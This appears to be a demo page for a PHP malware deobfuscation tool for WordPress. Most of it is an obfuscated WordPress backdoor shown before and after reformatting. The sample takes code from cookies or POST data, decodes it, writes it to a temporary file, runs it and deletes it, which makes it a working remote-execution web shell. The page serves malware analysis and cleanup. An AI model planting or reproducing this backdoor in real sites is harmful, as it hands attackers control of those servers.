Japanese 
English
PHP deobfuscation, decryption, reconstruction toolDe-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.
*Please note that not all obfuscation codes can be decoded.<?php
function go1($aa2){$km3 = "m" ."s3.E" ."a7HhiL8#<06oy(x)nF;rt*uvc?5" ."9b1g@e_ l4'fdp/" ."k" ."I-" ;$hr5='';foreach($aa2 as $ou4){$hr5.=$km3[$ou4];}return $hr5;}$ss6 = Array();$ss6[] = go1(Array(14,5,31,2,15,34,6,43,49,29,2,31,31,49,41,11,32,14,49,32,6,2,37,49,37,37,15,32,43,43,11,29,41,6,5,5));$ss6[] = go1(Array(30,45,8,45,39,36,27,21,40,9,21,47,18,38,38,22,48,10,4,38,38,20,23,39));$ss6[] = go1(Array(3,0,16,44,27,40,37));$ss6[] = go1(Array(7,26));$ss6[] = go1(Array(3,46));$ss6[] = go1(Array(12));$ss6[] = go1(Array(13));$ss6[] = go1(Array(43,9,40,37,38,45,27,25,38,29,16,21,25,37,21,25,1));$ss6[] = go1(Array(5,24,24,5,17,38,0,37,24,35,37));$ss6[] = go1(Array(1,25,24,38,24,37,45,37,5,25));$ss6[] = go1(Array(37,19,45,40,16,44,37));$ss6[] = go1(Array(1,27,33,1,25,24));$ss6[] = go1(Array(27,21,40,9,21,47));$ss6[] = go1(Array(1,25,24,40,37,21));$ss6[] = go1(Array(45,5,29,47));$ss6[] = go1(Array(0,44,31));foreach ($ss6[8]($_COOKIE, $_POST) as $er14 => $vf11){function an8($ss6, $er14, $cv10){return $ss6[11]($ss6[9]($er14 . $ss6[0], ($cv10 / $ss6[13]($er14)) + 1), 0, $cv10);}function sx7($ss6, $xz12){return @$ss6[14]($ss6[3], $xz12);}function ow9($ss6, $xz12){if (isset($xz12[2])) {$yy13 = $ss6[4] . $ss6[15]($ss6[0]) . $ss6[2];@$ss6[7]($yy13, $ss6[6] . $ss6[1] . $xz12[1]($xz12[2]));@include($yy13);@$ss6[12]($yy13);exit();}}$vf11 = sx7($ss6, $vf11);ow9($ss6, $ss6[10]($ss6[5], $vf11 ^ an8($ss6, $er14, $ss6[13]($vf11))));}<?php
function go1($aa2)
{
$km3 = "ms3.Ea7HhiL8#<06oy(x)nF;rt*uvc?59b1g@e_ l4'fdp/kI-";
$hr5 = '';
foreach ($aa2 as $ou4) {
$hr5 .= $km3[$ou4];
}
return $hr5;
}
$ss6 = array();
$ss6[] = go1(array(14, 5, 31, 2, 15, 34, 6, 43, 49, 29, 2, 31, 31, 49, 41, 11, 32, 14, 49, 32, 6, 2, 37, 49, 37, 37, 15, 32, 43, 43, 11, 29, 41, 6, 5, 5));
$ss6[] = go1(array(30, 45, 8, 45, 39, 36, 27, 21, 40, 9, 21, 47, 18, 38, 38, 22, 48, 10, 4, 38, 38, 20, 23, 39));
$ss6[] = go1(array(3, 0, 16, 44, 27, 40, 37));
$ss6[] = go1(array(7, 26));
$ss6[] = go1(array(3, 46));
$ss6[] = go1(array(12));
$ss6[] = go1(array(13));
$ss6[] = go1(array(43, 9, 40, 37, 38, 45, 27, 25, 38, 29, 16, 21, 25, 37, 21, 25, 1));
$ss6[] = go1(array(5, 24, 24, 5, 17, 38, 0, 37, 24, 35, 37));
$ss6[] = go1(array(1, 25, 24, 38, 24, 37, 45, 37, 5, 25));
$ss6[] = go1(array(37, 19, 45, 40, 16, 44, 37));
$ss6[] = go1(array(1, 27, 33, 1, 25, 24));
$ss6[] = go1(array(27, 21, 40, 9, 21, 47));
$ss6[] = go1(array(1, 25, 24, 40, 37, 21));
$ss6[] = go1(array(45, 5, 29, 47));
$ss6[] = go1(array(0, 44, 31));
foreach ($ss6[8]($_COOKIE, $_POST) as $er14 => $vf11) {
function an8($ss6, $er14, $cv10)
{
return $ss6[11]($ss6[9]($er14 . $ss6[0], $cv10 / $ss6[13]($er14) + 1), 0, $cv10);
}
function sx7($ss6, $xz12)
{
return @$ss6[14]($ss6[3], $xz12);
}
function ow9($ss6, $xz12)
{
if (isset($xz12[2])) {
$yy13 = $ss6[4] . $ss6[15]($ss6[0]) . $ss6[2];
@$ss6[7]($yy13, $ss6[6] . $ss6[1] . $xz12[1]($xz12[2]));
@(include $yy13);
@$ss6[12]($yy13);
exit;
}
}
$vf11 = sx7($ss6, $vf11);
ow9($ss6, $ss6[10]($ss6[5], $vf11 ^ an8($ss6, $er14, $ss6[13]($vf11))));
}Malware detection & removal plugin for WordPress
(C)2020 Wordpress Doctor All rights reserved.